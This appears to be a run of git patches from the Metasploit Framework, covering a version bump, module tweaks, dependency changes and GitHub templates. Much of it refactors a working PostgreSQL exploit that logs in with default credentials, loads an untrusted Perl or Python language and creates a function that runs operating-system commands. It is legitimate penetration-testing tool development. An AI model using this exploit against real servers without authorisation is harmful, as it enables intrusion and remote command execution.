metasploit-framework (4.11.11) + metasploit-framework (4.11.12) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index a5241a7344..76417d3584 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.11" + VERSION = "4.11.12" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 27af59ea7c5a24a63928cb70378148c3543f41d9 Mon Sep 17 00:00:00 2001 From: Tim <timrlw@gmail.com> Date: Sat, 20 Feb 2016 08:35:56 +0000 Subject: [PATCH 380/686] minor tweaks --- modules/post/multi/manage/set_wallpaper.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb index 926e219f74..5747f043a0 100644 --- a/modules/post/multi/manage/set_wallpaper.rb +++ b/modules/post/multi/manage/set_wallpaper.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Post 'Name' => 'Multi Manage Set Wallpaper', 'Description' => %q{ This module will set the desktop wallpaper background on the specified session. - The method of setting the wallpaper depends on the session type. + The method of setting the wallpaper depends on the platform type. }, 'License' => MSF_LICENSE, 'Author' => [ 'timwr'], @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Post register_options( [ - OptPath.new('WALLPAPER_FILE', [true, 'The local wallpaper file to set']) + OptPath.new('WALLPAPER_FILE', [true, 'The local wallpaper file to set on the remote session']) ], self.class) end @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Post print_status("#{peer} - Uploaded to #{remote_file}") remote_file end - + # # The OSX version uses an apple script to do this # @@ -89,9 +89,7 @@ class Metasploit3 < Msf::Post print_good("#{peer} - The wallpaper has been set") else print_error("#{peer} - Unable to set the wallpaper") - return end - end end From cef1b77e26af169af866acce5ebf1a044f5adb30 Mon Sep 17 00:00:00 2001 From: Tim <timrlw@gmail.com> Date: Sat, 20 Feb 2016 11:57:24 +0000 Subject: [PATCH 381/686] fixes for android set_audio_mode --- .../meterpreter/ui/console/command_dispatcher/android.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index d472a5c3c2..b8a3ec8df8 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -30,7 +30,7 @@ class Console::CommandDispatcher::Android 'send_sms' => 'Sends SMS from target session', 'wlan_geolocate' => 'Get current lat-long using WLAN information', 'interval_collect' => 'Manage interval collection capabilities', - 'activity_start' => 'Start an Android activity from a Uri string' + 'activity_start' => 'Start an Android activity from a Uri string', 'set_audio_mode' => 'Set Ringer Mode' } @@ -44,7 +44,7 @@ class Console::CommandDispatcher::Android 'send_sms' => ['send_sms'], 'wlan_geolocate' => ['wlan_geolocate'], 'interval_collect' => ['interval_collect'], - 'activity_start' => ['activity_start'] + 'activity_start' => ['activity_start'], 'set_audio_mode' => ['set_audio_mode'] } @@ -159,7 +159,7 @@ class Console::CommandDispatcher::Android mode = 1 set_audio_mode_opts = Rex::Parser::Arguments.new( '-h' => [ false, "Help Banner" ], - '-m' => [ true, "Set Mode - ( 0 - OFF, 1 - Normal) (Default: '#{mode}')"] + '-m' => [ true, "Set Mode - (0 - OFF, 1 - Normal, 2 - Max) (Default: '#{mode}')"] ) set_audio_mode_opts.parse(args) do |opt, _idx, val| @@ -175,7 +175,7 @@ class Console::CommandDispatcher::Android end client.android.set_audio_mode(mode) - print_status("Chenged Mode!") + print_status("Ringer mode was changed to #{mode}!") end def cmd_dump_sms(*args) From 3e22de116f887939e8b4755b32e8d588c7e59e4e Mon Sep 17 00:00:00 2001 From: Micheal <mpcottingham@gmail.com> Date: Sat, 20 Feb 2016 13:53:32 -0800 Subject: [PATCH 382/686] Changes to fix peer and style as recommended by jhart-r7. --- lib/msf/core/exploit/postgres.rb | 2 +- .../multi/postgres/postgres_createlang.rb | 76 +++++++------------ 2 files changed, 30 insertions(+), 48 deletions(-) diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index 09f3f9487e..c62d98c979 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb @@ -32,7 +32,7 @@ module Exploit::Remote::Postgres Opt::RPORT(5432), OptString.new('DATABASE', [ true, 'The database to authenticate against', 'template1']), OptString.new('USERNAME', [ true, 'The username to authenticate as', 'postgres']), - OptString.new('PASSWORD', [ false, 'The password for the specified username. Leave blank for a random password.', '']), + OptString.new('PASSWORD', [ false, 'The password for the specified username. Leave blank for a random password.', 'postgres']), OptBool.new('VERBOSE', [false, 'Enable verbose output', false]), OptString.new('SQL', [ false, 'The SQL query to execute', 'select version()']), OptBool.new('RETURN_ROWSET', [false, "Set to true to see query result sets", true]) diff --git a/modules/exploits/multi/postgres/postgres_createlang.rb b/modules/exploits/multi/postgres/postgres_createlang.rb index 9aee4b2548..6e659e9e8c 100644 --- a/modules/exploits/multi/postgres/postgres_createlang.rb +++ b/modules/exploits/multi/postgres/postgres_createlang.rb @@ -10,13 +10,14 @@ class Metasploit4 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Postgres + include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report # Creates an instance of this module. def initialize(info = {}) super(update_info(info, - 'Name' => 'PostgreSQL CREATE LANGUAGE Execution', - 'Description' => %q( + 'Name' => 'PostgreSQL CREATE LANGUAGE Execution', + 'Description' => %q( Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages. Most commonly this is Perl and Python. When enabled, command execution is possible on the host. To execute system commands, loading the "untrusted" version of the language is necessary. @@ -48,12 +49,7 @@ class Metasploit4 < Msf::Exploit::Remote ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 1 2016') - ) - - register_options([ - OptString.new('USERNAME', [true, 'The username to the service', 'postgres']), - OptString.new('PASSWORD', [true, 'The password to the service', 'postgres']) - ]) + ) deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE') end @@ -84,15 +80,13 @@ class Metasploit4 < Msf::Exploit::Remote case version when :noauth - print_error "#{rhost}:#{rport} - Authentication failed" + print_error "#{peer} - Authentication failed" return - when :noconn - print_error "#{rhost}:#{rport} - Connection failed" + print_error "#{peer} - Connection failed" return - else - print_status "#{rhost}:#{rport} - #{version}" + print_status "#{peer} - #{version}" end version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/) @@ -100,15 +94,13 @@ class Metasploit4 < Msf::Exploit::Remote extension = 'LANGUAGE' if major_version.to_i == 8 - print_status "#{rhost}:#{rport} - Selecting version 8 attack" + print_status "#{peer} - Selecting version 8 attack" extension = 'LANGUAGE' - elsif major_version.to_i >= 9 - print_status "#{rhost}:#{rport} - Selecting version 9 attack" + print_status "#{peer} - Selecting version 9 attack" extension = 'EXTENSION' - else - print_error "#{rhost}:#{rport} - Unsupported version - #{version}" + print_error "#{peer} - Unsupported version - #{version}" return false end @@ -125,25 +117,21 @@ class Metasploit4 < Msf::Exploit::Remote load_lang = create_language(language, extension) human_language = language.capitalize - print_status "#{rhost}:#{rport} - Attempting to load #{human_language}" + print_status "#{peer} - Attempting to load #{human_language}" case load_lang when :exists - print_good "#{rhost}:#{rport} - language is already loaded, continuing" + print_good "#{peer} - #{human_language} is already loaded, continuing" create_function(language, func_name) loaded = true - when :loaded - print_good "#{rhost}:#{rport} - language was successfully loaded, continuing" + print_good "#{peer} - #{human_language} was successfully loaded, continuing" create_function(language, func_name) loaded = true - when :not_exists - print_status "#{rhost}:#{rport} - language could not be loaded" - + print_status "#{peer} - #{human_language} could not be loaded" else - print_error "#{rhost}:#{rport} - Error occurred" - return false + print_error "#{peer} - error occurred loading #{human_language}" end break if loaded @@ -157,18 +145,16 @@ class Metasploit4 < Msf::Exploit::Remote case select_query.keys[0] when :conn_error - print_error "#{rhost}:#{rport} - Connection error" - + print_error "#{peer} - Connection error" when :sql_error - print_error "#{rhost}:#{rport} - Exploit failed" + print_error "#{peer} - Exploit failed" return false - when :complete - print_good "#{rhost}:#{rport} - Exploit successful" + print_good "#{peer} - Exploit successful" end else - print_error "#{rhost}:#{rport} - Exploit failed" + print_error "#{peer} - Exploit failed -- unable to load any languages" return false end end @@ -182,27 +168,24 @@ class Metasploit4 < Msf::Exploit::Remote case language when 'perl' load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \ - "`$_[0]`;" \ - "$$ LANGUAGE pl#{language}u") - + "`$_[0]`;" \ + "$$ LANGUAGE pl#{language}u") when /^python(?:2|3)?/i load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \ - "import subprocess, shlex\r" \ - "subprocess.check_output(shlex.split(c))\r" \ - "$$ LANGUAGE pl#{language}u") + "import subprocess, shlex\r" \ + "subprocess.check_output(shlex.split(c))\r" \ + "$$ LANGUAGE pl#{language}u") end case load_func.keys[0] when :conn_error - print_error "#{rhost}:#{rport} - Connection error" - + print_error "#{peer} - Connection error" when :sql_error - print_error "#{rhost}:#{rport} Exploit failed" + print_error "#{peer} Exploit failed" return false - when :complete - print_good "#{rhost}:#{rport} - Loaded UDF (exec_#{func_name})" - end + print_good "#{peer} - Loaded UDF (exec_#{func_name})" + end end def create_language(language, extension) @@ -214,7 +197,6 @@ class Metasploit4 < Msf::Exploit::Remote if match_exists return :exists - else match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m) @@ -244,7 +226,7 @@ class Metasploit4 < Msf::Exploit::Remote return result[:auth] else - print_status "#{rhost}:#{rport} - Login failed" + print_status "#{peer} - Login failed" return :noauth end From 53a52fafd59e4b2afda7d97a3126d1714bde9a9e Mon Sep 17 00:00:00 2001 From: nixawk <hap.ddup@gmail.com> Date: Mon, 22 Feb 2016 00:34:49 +0800 Subject: [PATCH 383/686] make code to be readable / rebuild / testing --- .../multi/postgres/postgres_createlang.rb | 325 ++++++++---------- 1 file changed, 148 insertions(+), 177 deletions(-) diff --git a/modules/exploits/multi/postgres/postgres_createlang.rb b/modules/exploits/multi/postgres/postgres_createlang.rb index 6e659e9e8c..e938f9b833 100644 --- a/modules/exploits/multi/postgres/postgres_createlang.rb +++ b/modules/exploits/multi/postgres/postgres_createlang.rb @@ -13,225 +13,196 @@ class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report - # Creates an instance of this module. def initialize(info = {}) super(update_info(info, - 'Name' => 'PostgreSQL CREATE LANGUAGE Execution', - 'Description' => %q( - Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages. - Most commonly this is Perl and Python. When enabled, command execution is possible on the host. - To execute system commands, loading the "untrusted" version of the language is necessary. - This requires a superuser. This is usually postgres. The execution should be platform-agnostic, - and has been tested on OS X, Windows, and Linux. + 'Name' => 'PostgreSQL CREATE LANGUAGE Execution', + 'Description' => %q( + Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages. + Most commonly this is Perl and Python. When enabled, command execution is possible on the host. + To execute system commands, loading the "untrusted" version of the language is necessary. + This requires a superuser. This is usually postgres. The execution should be platform-agnostic, + and has been tested on OS X, Windows, and Linux. - This module attempts to load Perl or Python to execute system commands. As this dynamically loads - a scripting language to execute commands, it is not necessary to drop a file on the filesystem. + This module attempts to load Perl or Python to execute system commands. As this dynamically loads + a scripting language to execute commands, it is not necessary to drop a file on the filesystem. - Only Postgres 8 and up are supported. - ), - 'Author' => [ - 'Micheal Cottingham', # author of this module - 'midnitesnake', # the postgres_payload module that this is based on - ], - 'License' => MSF_LICENSE, - 'References' => [ - ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'], - ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'], - ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html'] - ], - 'Platform' => %w(linux unix win osx), - 'Payload' => { - 'PayloadType' => %w(cmd) - }, - 'Arch' => [ARCH_CMD], - 'Targets' => [ - ['Automatic', {}] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jan 1 2016') - ) + Only Postgres 8 and up are supported. + ), + 'Author' => [ + 'Micheal Cottingham', # author of this module + 'midnitesnake', # the postgres_payload module that this is based on, + 'Nixawk' # Improves the module + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'], + ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'], + ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html'] + ], + 'Platform' => %w(linux unix win osx), + 'Payload' => { + 'PayloadType' => %w(cmd) + }, + 'Arch' => [ARCH_CMD], + 'Targets' => [ + ['Automatic', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 1 2016')) deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE') end + def postgres_major_version(version) + version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/) + version_match['major_version'] + end + def check - version = postgres_fingerprint - - if version[:auth] - version_match = version[:auth].match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/) - major_version = version_match['major_version'] - - if major_version.to_i >= 8 - return CheckCode::Appears - - else - print_error "#{peer} - Unsupported version - #{version[:auth]}" - return CheckCode::Safe - end - + if vuln_version? + Exploit::CheckCode::Appears else - print_error "#{peer} - Authentication failed" - return CheckCode::Unknown + Exploit::CheckCode::Safe end end - def exploit - version = do_login(username, password, database) - - case version - when :noauth - print_error "#{peer} - Authentication failed" - return - when :noconn - print_error "#{peer} - Connection failed" - return - else - print_status "#{peer} - #{version}" + def vuln_version? + version = postgres_fingerprint + if version[:auth] + major_version = postgres_major_version(version[:auth]) + return true if major_version.to_i >= 8 end + false + end - version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/) - major_version = version_match['major_version'] - extension = 'LANGUAGE' - - if major_version.to_i == 8 - print_status "#{peer} - Selecting version 8 attack" - extension = 'LANGUAGE' - elsif major_version.to_i >= 9 - print_status "#{peer} - Selecting version 9 attack" - extension = 'EXTENSION' + def login_success? + status = do_login(username, password, database) + case status + when :noauth + print_error "#{peer} - Authentication failed" + return false + when :noconn + print_error "#{peer} - Connection failed" + return false else - print_error "#{peer} - Unsupported version - #{version}" + print_status "#{peer} - #{status}" + return true + end + end + + def load_extension?(language) + case load_procedural_language(language, 'LANGUAGE') + when :exists + print_good "#{peer} - #{language} is already loaded, continuing" + return true + when :loaded + print_good "#{peer} - #{language} was successfully loaded, continuing" + return true + when :not_exists + print_status "#{peer} - #{language} could not be loaded" + return false + else + print_error "#{peer} - error occurred loading #{language}" return false end - - print_warning 'This exploit does not clean up after itself - you will need to do that manually' - - # Attack! - begin - func_name = Rex::Text.rand_text_alpha(10) - - languages = %w(perl python python2 python3) - loaded = false - - languages.each do |language| - load_lang = create_language(language, extension) - human_language = language.capitalize - - print_status "#{peer} - Attempting to load #{human_language}" - - case load_lang - when :exists - print_good "#{peer} - #{human_language} is already loaded, continuing" - create_function(language, func_name) - loaded = true - when :loaded - print_good "#{peer} - #{human_language} was successfully loaded, continuing" - create_function(language, func_name) - loaded = true - when :not_exists - print_status "#{peer} - #{human_language} could not be loaded" - else - print_error "#{peer} - error occurred loading #{human_language}" - end - - break if loaded - end - - if loaded - # Known bug: When using the cmd/unix/python*, ruby*, or bash payloads, it'll say - # "NoMethodError undefined method `+' for nil:NilClass" - # But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal - select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')") - - case select_query.keys[0] - when :conn_error - print_error "#{peer} - Connection error" - when :sql_error - print_error "#{peer} - Exploit failed" - return false - when :complete - print_good "#{peer} - Exploit successful" - end - - else - print_error "#{peer} - Exploit failed -- unable to load any languages" - return false - end - end - - postgres_logout if @postgres_conn end - def create_function(language, func_name) + def exec_function?(func_name) + query = "SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')" + select_query = postgres_query(query) + + case select_query.keys[0] + when :conn_error + print_error "#{peer} - Connection error" + return false + when :sql_error + print_error "#{peer} - Exploit failed" + return false + when :complete + print_good "#{peer} - Exploit successful" + return true + else + print_error "#{peer} - Unknown" + return false + end + end + + def create_function?(language, func_name) load_func = '' case language - when 'perl' - load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \ - "`$_[0]`;" \ - "$$ LANGUAGE pl#{language}u") - when /^python(?:2|3)?/i - load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \ - "import subprocess, shlex\r" \ - "subprocess.check_output(shlex.split(c))\r" \ - "$$ LANGUAGE pl#{language}u") + when 'perl' + query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" + query << "`$_[0]`;" + query << "$$ LANGUAGE pl#{language}u" + load_func = postgres_query(query) + when /^python(?:2|3)?/i + query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" + query << "import subprocess, shlex\rsubprocess.check_output(shlex.split(c))\r" + query << "$$ LANGUAGE pl#{language}u" + load_func = postgres_query(query) end case load_func.keys[0] - when :conn_error - print_error "#{peer} - Connection error" - when :sql_error - print_error "#{peer} Exploit failed" - return false - when :complete - print_good "#{peer} - Loaded UDF (exec_#{func_name})" - end - end - - def create_language(language, extension) - load_language = postgres_query("CREATE #{extension} pl#{language}u") - - if load_language.keys[0] == :sql_error - - match_exists = load_language[:sql_error].match(/(?:(extension|language) "pl#{language}u" already exists)/m) - - if match_exists - return :exists - else - match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m) - - if match_error - return :not_exists - end - end - + when :conn_error + print_error "#{peer} - Connection error" + return false + when :sql_error + print_error "#{peer} Exploit failed" + return false + when :complete + print_good "#{peer} - Loaded UDF (exec_#{func_name})" + return true else - return :loaded + print_error "#{peer} - Unknown" + return false end end - # Authenticate to the postgres server. - # Returns the version from #postgres_fingerprint + def load_procedural_language(language, extension) + query = "CREATE #{extension} pl#{language}u" + load_language = postgres_query(query) + return :loaded unless load_language.keys[0] == :sql_error + + match_exists = load_language[:sql_error].match(/(?:(extension|language) "pl#{language}u" already exists)/m) + return :exists if match_exists + + match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m) + return :not_exists if match_error + end + def do_login(user, pass, database) begin password = pass || postgres_password - result = postgres_fingerprint( db: database, username: user, password: password ) - if result[:auth] - return result[:auth] - - else - print_status "#{peer} - Login failed" - return :noauth - end + return result[:auth] if result[:auth] + print_status "#{peer} - Login failed" + return :noauth rescue Rex::ConnectionError return :noconn end end + + def exploit + return unless vuln_version? + return unless login_success? + + languages = %w(perl python python2 python3) + languages.each do |language| + next unless load_extension?(language) + func_name = Rex::Text.rand_text_alpha(10) + next unless create_function?(language, func_name) + if exec_function?(func_name) + print_warning "Please clear extension [#{language}]: function [#{func_name}] manually" + break + end + end + postgres_logout if @postgres_conn + end end From 138e48b2023e70309be4e2c0f9138aa726ca8695 Mon Sep 17 00:00:00 2001 From: nixawk <hap.ddup@gmail.com> Date: Mon, 22 Feb 2016 00:39:44 +0800 Subject: [PATCH 384/686] Fix vuln_version? --- modules/exploits/multi/postgres/postgres_createlang.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/postgres/postgres_createlang.rb b/modules/exploits/multi/postgres/postgres_createlang.rb index e938f9b833..910d9526a5 100644 --- a/modules/exploits/multi/postgres/postgres_createlang.rb +++ b/modules/exploits/multi/postgres/postgres_createlang.rb @@ -70,7 +70,7 @@ class Metasploit4 < Msf::Exploit::Remote version = postgres_fingerprint if version[:auth] major_version = postgres_major_version(version[:auth]) - return true if major_version.to_i >= 8 + return true if major_version && major_version.to_i >= 8 end false end From d7ba37d2e6bf9f3ea94794ce78b497ef748fb3cc Mon Sep 17 00:00:00 2001 From: RageLtMan <rageltman [at] sempervictus> Date: Sun, 21 Feb 2016 20:20:22 -0500 Subject: [PATCH 385/686] Msf::Exploit::Remote::HttpServer print_* fix Exploit::Remote::HttpServer and every descendant utilizes the print_prefix method which checks whether the module which mixes in these modules is aggressive. This is done in a proc context most of the time since its a callback on the underlying Rex HTTP server. When modules do not define :aggressive? the resulting exceptions are quietly swallowed, and requestors get an empty response as the client object dies off. Add check for response to :aggressive? in :print_prefix to address this issue. --- lib/msf/core/exploit/http/server.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index d500a1b336..6a101b9316 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -73,7 +73,7 @@ module Exploit::Remote::HttpServer end def print_prefix - if cli && !aggressive? + if cli && (respond_to?(:aggressive) && !aggressive?) super + "#{cli.peerhost.ljust(16)} #{self.shortname} - " else super From c0c6dc7a188cf39a238df78f47b3cb33d87c56da Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 22 Feb 2016 11:31:58 -0600 Subject: [PATCH 386/686] point to other staging brnaches for gems the gem dependencies that have been modified so far are being pulled in from their staging branches on github instead of rubygems for this branch --- Gemfile | 4 ++ Gemfile.lock | 85 +++++++++++++++++++++--------------- metasploit-framework.gemspec | 6 +-- 3 files changed, 57 insertions(+), 38 deletions(-) diff --git a/Gemfile b/Gemfile index 9893680a4d..e80c053372 100755 --- a/Gemfile +++ b/Gemfile @@ -18,6 +18,10 @@ group :development do gem 'yard' # for development and testing purposes gem 'pry' + # rails-upgrade staging gems + gem 'metasploit-concern', git: 'https://github.com/rapid7/metasploit-concern', branch: 'staging/rails-upgrade' + gem 'metasploit_data_models', git: 'https://github.com/rapid7/metasploit_data_models', branch: 'staging/rails-upgrade' + gem 'metasploit-credential', git: 'https://github.com/rapid7/metasploit-credential', branch: 'staging/rails-upgrade' end group :development, :test do diff --git a/Gemfile.lock b/Gemfile.lock index 4cf7c7588b..87d99183ab 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,3 +1,43 @@ +GIT + remote: https://github.com/rapid7/metasploit-concern + revision: ef10168eea90af393f595d426aadb5ca33dfe031 + branch: staging/rails-upgrade + specs: + metasploit-concern (1.0.1.pre.rails.pre.upgrade) + activerecord (>= 4.0.9, < 4.1.0) + activesupport (>= 4.0.9, < 4.1.0) + railties (>= 4.0.9, < 4.1.0) + +GIT + remote: https://github.com/rapid7/metasploit-credential + revision: 9aa0cf5812fc7bc27c25e122c9648ffc5798735d + branch: staging/rails-upgrade + specs: + metasploit-credential (2.0.0.pre.rails.pre.upgrade) + metasploit-concern + metasploit-model (~> 1.0) + metasploit_data_models + pg + railties + rubyntlm + rubyzip (~> 1.1) + +GIT + remote: https://github.com/rapid7/metasploit_data_models + revision: 97197d0955936ee2f0881dd262951dfc667b905b + branch: staging/rails-upgrade + specs: + metasploit_data_models (2.0.0.pre.rails.pre.upgrade) + activerecord (>= 4.0.9, < 4.1.0) + activesupport (>= 4.0.9, < 4.1.0) + arel-helpers + metasploit-concern (~> 1.0) + metasploit-model (~> 1.0) + pg + postgres_ext + railties (>= 4.0.9, < 4.1.0) + recog (~> 2.0) + PATH remote: . specs: @@ -10,11 +50,8 @@ PATH jsobfu (~> 0.4.1) json metasm (~> 1.0.2) - metasploit-concern (= 1.0.0) - metasploit-credential (= 1.0.1) metasploit-model (= 1.0.0) metasploit-payloads (= 1.1.0) - metasploit_data_models (= 1.2.10) msgpack network_interface (~> 0.0.1) nokogiri @@ -58,8 +95,8 @@ GEM thread_safe (~> 0.1) tzinfo (~> 0.3.37) arel (4.0.2) - arel-helpers (2.1.1) - activerecord (= 4.0.13) + arel-helpers (2.2.0) + activerecord (>= 3.1.0, < 5) aruba (0.6.2) childprocess (>= 0.3.6) cucumber (>= 1.1.1) @@ -108,38 +145,16 @@ GEM mail (2.6.3) mime-types (>= 1.16, < 3) metasm (1.0.2) - metasploit-concern (1.0.0) - activerecord (>= 4.0.9, < 4.1.0) - activesupport (>= 4.0.9, < 4.1.0) - railties (>= 4.0.9, < 4.1.0) - metasploit-credential (1.0.1) - metasploit-concern (~> 1.0) - metasploit-model (~> 1.0) - metasploit_data_models (~> 1.0) - pg - railties - rubyntlm - rubyzip (~> 1.1) metasploit-model (1.0.0) activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) metasploit-payloads (1.1.0) - metasploit_data_models (1.2.10) - activerecord (>= 4.0.9, < 4.1.0) - activesupport (>= 4.0.9, < 4.1.0) - arel-helpers - metasploit-concern (~> 1.0) - metasploit-model (~> 1.0) - pg - postgres_ext - railties (>= 4.0.9, < 4.1.0) - recog (~> 2.0) method_source (0.8.2) mime-types (2.6.1) mini_portile2 (2.0.0) minitest (4.7.5) - msgpack (0.7.1) + msgpack (0.7.4) multi_json (1.11.2) multi_test (0.1.2) network_interface (0.0.1) @@ -149,10 +164,10 @@ GEM packetfu (1.1.11) network_interface (~> 0.0) pcaprub (~> 0.12) - pcaprub (0.12.0) + pcaprub (0.12.1) pg (0.18.4) pg_array_parser (0.0.9) - postgres_ext (2.4.1) + postgres_ext (3.0.0) activerecord (>= 4.0.0) arel (>= 4.0.1) pg_array_parser (~> 0.0.9) @@ -200,8 +215,8 @@ GEM rspec-mocks (~> 3.3.0) rspec-support (~> 3.3.0) rspec-support (3.3.0) - rubyntlm (0.5.2) - rubyzip (1.1.7) + rubyntlm (0.6.0) + rubyzip (1.2.0) shoulda-matchers (2.8.0) activesupport (>= 3.0.0) simplecov (0.9.2) @@ -237,7 +252,10 @@ DEPENDENCIES cucumber-rails factory_girl_rails (~> 4.5.0) fivemat (~> 1.3.1) + metasploit-concern! + metasploit-credential! metasploit-framework! + metasploit_data_models! pry rake (>= 10.0.0) redcarpet @@ -246,6 +264,3 @@ DEPENDENCIES simplecov timecop yard - -BUNDLED WITH - 1.11.2 diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 0aba1e8d59..f3a5862ae6 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -61,11 +61,11 @@ Gem::Specification.new do |spec| # Metasm compiler/decompiler/assembler spec.add_runtime_dependency 'metasm', '~> 1.0.2' # Metasploit::Concern hooks - spec.add_runtime_dependency 'metasploit-concern', '1.0.0' + #spec.add_runtime_dependency 'metasploit-concern', '1.0.0' # Metasploit::Credential database models - spec.add_runtime_dependency 'metasploit-credential', '1.0.1' + #spec.add_runtime_dependency 'metasploit-credential', '1.0.1' # Database models shared between framework and Pro. - spec.add_runtime_dependency 'metasploit_data_models', '1.2.10' + #spec.add_runtime_dependency 'metasploit_data_models', '1.2.10' # Things that would normally be part of the database model, but which # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.0.0' From 18784b0b5b7e29b8272f4162b274ac809885b3ac Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 22 Feb 2016 11:46:21 -0600 Subject: [PATCH 387/686] Add issue template --- .github/ISSUE_TEMPLATE.md | 41 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 .github/ISSUE_TEMPLATE.md diff --git a/.github/ISSUE_TEMPLATE.md b/.github/ISSUE_TEMPLATE.md new file mode 100644 index 0000000000..a403bc7bcc --- /dev/null +++ b/.github/ISSUE_TEMPLATE.md @@ -0,0 +1,41 @@ +## Steps to reproduce + +How'd you do it? + +1. ... +2. ... + +This section should also tell us any relevant information about the +environment; for example, if an exploit that used to work is failing, +tell us the victim operating system and service versions. + +## Expected behavior + +What should happen? + +## Current behavior + +What happens instead? + +You might also want to check the last ~1k lines of +`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or +`~/.msf4/logs/framework.log` for relevant stack traces + + +## System stuff + +### Metasploit version + +Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install). + +### I installed Metasploit with: +- [ ] Kali package via apt +- [ ] Omnibus installer (nightly) +- [ ] Commercial/Community installer (from download.rapid7.com) +- [ ] Source install (please specify ruby version) + +### OS + +What OS are you running Metasploit on? + + From 77ee84e0ab727edf40c4ef5785e906c34646d7d5 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 22 Feb 2016 12:44:42 -0600 Subject: [PATCH 388/686] Add pull request template --- .github/PULL_REQUEST_TEMPLATE.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 .github/PULL_REQUEST_TEMPLATE.md diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md new file mode 100644 index 0000000000..cb977a9da4 --- /dev/null +++ b/.github/PULL_REQUEST_TEMPLATE.md @@ -0,0 +1,14 @@ + +Tell us what this change does. If you're fixing a bug, please mention +the github issue number. + +## Verification + +List the steps needed to make sure this thing works + +- [ ] Start `msfconsole` +- [ ] `use exploit/windows/smb/ms08_067_netapi` +- [ ] ... +- [ ] **Verify** the thing does what it should +- [ ] **Verify** the thing does not do what it 